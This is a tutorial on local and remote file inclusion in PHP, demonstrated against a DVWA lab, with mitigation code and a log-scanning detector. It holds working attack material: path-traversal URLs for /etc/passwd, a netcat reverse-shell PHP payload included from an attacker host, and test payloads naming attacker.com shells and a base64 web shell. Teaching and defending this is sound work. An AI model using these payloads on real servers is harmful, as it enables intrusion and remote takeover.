📋 Table of Contents
- Introduction to File Inclusion Vulnerabilities
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- Prevention and Mitigation
🎯 Introduction to File Inclusion Vulnerabilities
File inclusion vulnerabilities are critical security flaws that allow attackers to read, include, or execute files on a web server. These vulnerabilities occur when a web application uses user-supplied input to construct file paths without proper validation or sanitization.
Diagram: File Inclusion Vulnerability Types (Local File Inclusion (LFI) and Remote File Inclusion (RFI))
📂 Local File Inclusion (LFI)
What is Local File Inclusion?
Local File Inclusion (LFI) is a vulnerability that allows an attacker to include files that already exist on the target server. This enables reading sensitive files, including those located outside the web root directory (/var/www/).
- Attackers can read sensitive configuration files containing passwords and credentials
- Access to files from other websites hosted on the same server
- Potential for privilege escalation and further exploitation
- Exposure of application source code and business logic
How LFI Works
LFI vulnerabilities typically exploit URL parameters that reference files. The vulnerability occurs when the application includes files based on user input without proper validation.
Example of Vulnerable Code:
```php
// Vulnerable PHP code
$page = $_GET['page'];
include($page . ".php");
```
Normal Usage:
http://example.com/index.php?page=include
This loads: include.php
Malicious Usage:
http://example.com/index.php?page=../../../../etc/passwd
This attempts to load: /etc/passwd
Diagram: LFI attack flow (vulnerable parameter → path traversal → sensitive files → information disclosure)
Practical LFI Example
Consider a web application with the following URL structure:
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=include.php
This URL indicates that the application is loading a file called include.php. An attacker can exploit this by using path traversal techniques to access files outside the intended directory.
Step-by-Step Attack Process:
- Identify the current directory depth: Determine how many directories you need to traverse backwards
- Use path traversal sequences: Use "../" to move up directory levels
- Target sensitive files: Access files like /etc/passwd
Attack Example:
```text
// Original URL
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=include.php
// Exploited URL to read /etc/passwd
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
```
Path Breakdown:
| Traversal | Directory Level |
|---|---|
| ../ | Move from /fi/ to /vulnerabilities/ |
| ../ | Move from /vulnerabilities/ to /dvwa/ |
| ../ | Move from /dvwa/ to /var/www/html/ |
| ../ | Move from /html/ to /var/www/ |
| ../ | Move from /www/ to /var/ |
| etc/passwd | Access target file |
Common Target Files in LFI Attacks
| File Path | Description | Information Gained |
|---|---|---|
| /etc/passwd | User account information | Usernames, home directories, default shells |
| /etc/shadow | Encrypted passwords | Password hashes (requires root access) |
| /var/log/apache2/access.log | Apache access logs | Visitor information, potential for log poisoning |
| /proc/self/environ | Environment variables | System configuration, potential credentials |
| config.php | Application configuration | Database credentials, API keys |
🌐 Remote File Inclusion (RFI)
What is Remote File Inclusion?
Remote File Inclusion (RFI) is an advanced form of file inclusion vulnerability that allows attackers to include files from remote servers. This is significantly more dangerous than LFI because it enables attackers to inject malicious code, establish backdoors, and gain complete control over the target server.
- Complete server compromise
- Remote code execution
- Reverse shell access
- Data exfiltration and modification
- Lateral movement to other systems
Prerequisites for RFI
For RFI to be possible, the target server must have specific PHP configuration settings enabled:
```ini
; In php.ini configuration file
allow_url_fopen = On
allow_url_include = On
```
Diagram: RFI attack architecture (attacker server 10.20.14.203 hosts the payload reverse.txt; target server 10.20.14.204 includes it; reverse connection established back to 10.20.14.203)
RFI Attack Process
Step 1: Create Malicious Payload
Create a PHP file containing malicious code. The example below creates a reverse shell connection:
```php
<?php
passthru("nc -e /bin/bash 10.20.14.203 8080");
?>
```
Step 2: Host the Payload
Place the payload file on a web server accessible by the target. For testing purposes, you can use your local web server:
```text
// Save to web root
/var/www/html/reverse.txt
// Accessible at:
http://10.20.14.203/reverse.txt
```
Step 3: Set Up Listener
Before exploiting the vulnerability, set up a listener on your machine to catch the reverse connection:
```bash
nc -lvp 8080
```
Step 4: Execute the Attack
Inject the remote file URL into the vulnerable parameter:
Attack URL:
```text
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=http://10.20.14.203/reverse.txt?
```
Note: The trailing "?" may be required to prevent the application from appending ".php" to your URL.
Understanding the RFI Payload
Payload Breakdown:
```php
<?php
// Start of PHP code block
// passthru()   - executes a system command and passes its output straight through
// nc           - netcat, the tool used to open the network connection
// -e /bin/bash - attaches a bash shell to that connection
// 10.20.14.203 - the attacker's IP address
// 8080         - the port to connect back to
passthru("nc -e /bin/bash 10.20.14.203 8080");
// End of PHP code block (the closing tag must come after this comment, or the
// comment would be sent to the browser as plain text)
?>
```
| Component | Function | Purpose |
|---|---|---|
| passthru() | PHP function | Executes system commands and outputs results |
| nc (netcat) | Networking utility | Creates TCP/UDP connections |
| -e /bin/bash | Netcat parameter | Provides shell access through the connection |
| IP:Port | Connection details | Specifies where to connect back |
After Successful RFI Exploitation
Once the payload executes successfully, you'll receive a reverse shell connection with full access to the target system. You can then execute commands:
```bash
# Verify system information
uname -a
# Check current directory
pwd
# List files
ls -la
# View system users
cat /etc/passwd
# Navigate directories
cd /var/www/html
```
Comparison: LFI vs RFI
| Aspect | Local File Inclusion (LFI) | Remote File Inclusion (RFI) |
|---|---|---|
| File Source | Same server | Remote server (attacker-controlled) |
| Severity | High | Critical |
| Requirements | File inclusion vulnerability | File inclusion + allow_url_include enabled |
| Capabilities | Read local files | Execute arbitrary code, reverse shells |
| Common Targets | Configuration files, logs, passwords | Complete system compromise |
| Prevention Difficulty | Moderate | Easier (disable specific PHP settings) |
🛡️ Prevention and Mitigation Strategies
For Developers
1. Input Validation and Sanitization
```php
// BAD - Vulnerable code
$page = $_GET['page'];
include($page . ".php");

// GOOD - Secure code with whitelist (strict comparison, so only exact matches pass)
$allowed_pages = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? '';
if (in_array($page, $allowed_pages, true)) {
    include($page . ".php");
} else {
    include("error.php");
}
```
2. Use Basename Function
```php
// Remove path traversal attempts: basename() keeps only the final path component
$page = basename($_GET['page']);
include("pages/" . $page . ".php");
```
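The two ideas above can be combined into one dispatcher: an allowlist with strict comparison, followed by a realpath() containment check as defence in depth. This is an added example, not code from the original article; it assumes the includable pages live in a pages/ directory next to the script and that an error.php exists.

```php
<?php
// Added example (not from the original article): a hardened replacement for
//   include($_GET['page'] . ".php");
// Assumed layout: ./pages/home.php, ./pages/about.php, ... and ./error.php
declare(strict_types=1);

const PAGES_DIR     = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Map a user-supplied page name to an absolute path inside PAGES_DIR.
 * Returns null for anything that is not an allowlisted, existing page.
 */
function resolve_page(string $page): ?string
{
    // 1. Allowlist with strict comparison: rejects "../", "http://", "%00" and
    //    the type juggling that a loose in_array() would permit.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: realpath() canonicalises "..", resolves symlinks and
    //    returns false for missing files and for stream wrappers (http://, data://).
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    // 3. Containment: the canonical path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Dispatcher: unknown or tampered page names fall back to error.php.
$target = resolve_page((string) ($_GET['page'] ?? 'home'));
if ($target === null) {
    http_response_code(404);
    include __DIR__ . '/error.php';
} else {
    include $target;
}
```

The realpath() steps are redundant while the allowlist is in place, but they keep the include contained if the allowlist is later relaxed to a pattern match.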
3. Disable Dangerous PHP Functions
```ini
; In php.ini
allow_url_fopen = Off
allow_url_include = Off
disable_functions = exec,passthru,shell_exec,system
```
Security Best Practices
| Practice | Implementation | Benefit |
|---|---|---|
| Whitelist Approach | Only allow predefined file names | Eliminates path traversal attacks |
| Absolute Paths | Use full file paths in include statements | Prevents directory traversal |
| Input Filtering | Remove special characters (../, \, etc.) | Blocks traversal sequences |
| Least Privilege | Run web server with minimal permissions | Limits damage from exploitation |
| Regular Updates | Keep PHP and frameworks updated | Patches known vulnerabilities |
For System Administrators
- Disable Remote File Inclusion: Set allow_url_include = Off in php.ini
- Configure Web Server: Restrict access to sensitive directories
- Implement WAF: Use Web Application Firewall to detect and block attacks
- File Permissions: Set appropriate permissions on sensitive files (chmod 600 for configs)
- Monitor Logs: Regularly check web server logs for suspicious patterns
Detection Patterns to Monitor:
- Multiple "../" sequences in URLs
- Attempts to access /etc/passwd or other system files
- URLs containing "http://" or "https://" in parameters
- Unusual file extensions (.txt files being requested as PHP)
- Requests from unexpected geographic locations
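Applying the patterns above to Apache access-log lines, as an added example that is not part of the original article: each request target is URL-decoded twice so double-encoded traversal is caught, then every indicator that fires is reported. The log lines are constructed sample data that reuse the article's DVWA URL and IP addresses.

```php
<?php
// Added example (not from the original article): scan Apache access-log lines for
// the LFI/RFI indicators listed above. The log lines are constructed sample data.
const SAMPLE_LOG = <<<'LOG'
10.20.14.203 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532
10.20.14.203 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd HTTP/1.1" 200 2048
10.20.14.203 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%252f..%252fetc%252fpasswd%00 HTTP/1.1" 500 0
10.20.14.203 - - [01/Jan/2024:10:00:20 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://10.20.14.203/reverse.txt? HTTP/1.1" 200 0
10.20.14.203 - - [01/Jan/2024:10:00:25 +0000] "GET /dvwa/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHA HTTP/1.1" 200 0
LOG;
// Indicator name => regex, matched against the fully URL-decoded request target.
const INDICATORS = [
    'path traversal'      => '~\.\.[/\\\\]~',
    'system file access'  => '~/(etc/(passwd|shadow)|proc/self/environ)~i',
    'remote URL in param' => '~[?&][^=&]*=(https?:)?//~i',
    'php stream wrapper'  => '~[?&][^=&]*=(data|php|phar|ftp|file):~i',
    'null byte'           => '~\x00~',
];
/** Return the names of all indicators present in one request target. */
function scan_request_target(string $target): array
{
    // Decode twice so double-encoded traversal (%252e%252e%252f) is caught too;
    // rawurldecode keeps "+" literal so it does not disturb the patterns.
    $decoded = rawurldecode(rawurldecode($target));
    $hits = [];
    foreach (INDICATORS as $name => $regex) {
        if (preg_match($regex, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}
/** Parse Common Log Format lines; return one finding per suspicious request. */
function scan_access_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Skip lines that are not in Common/Combined Log Format instead of failing.
        if (preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m) !== 1) continue;
        $hits = scan_request_target($m[4]);
        if ($hits !== []) {
            $findings[] = ['time' => $m[2], 'client' => $m[1], 'status' => (int) $m[5], 'target' => $m[4], 'indicators' => $hits];
        }
    }
    return $findings;
}
foreach (scan_access_log(SAMPLE_LOG) as $f) {
    printf("%s %s %d %s -> %s\n", $f['time'], $f['client'], $f['status'], $f['target'], implode(', ', $f['indicators']));
}
```

Run against the sample, the first (legitimate) request produces no finding, while the other four are reported with the indicators that matched; in production the same functions can be fed a real log via file() or a stream.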
Testing for File Inclusion Vulnerabilities
Security professionals should regularly test applications for these vulnerabilities using both automated tools and manual testing techniques.
Common Test Payloads:
```text
// Path traversal tests
../
../../
../../../etc/passwd
....//....//....//etc/passwd
// Null byte injection (older PHP versions)
../../../etc/passwd%00
// RFI tests
http://attacker.com/shell.txt
//attacker.com/shell.txt
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
```
🎓 Conclusion
File inclusion vulnerabilities represent serious security risks that can lead to complete system compromise. Understanding both Local File Inclusion (LFI) and Remote File Inclusion (RFI) is essential for both security professionals conducting ethical penetration tests and developers building secure applications.
Key Takeaways:
- LFI allows reading sensitive files on the server
- RFI enables remote code execution and complete system access
- Both vulnerabilities stem from improper input validation
- Prevention requires multiple layers of security controls
- Regular security testing is essential for identifying vulnerabilities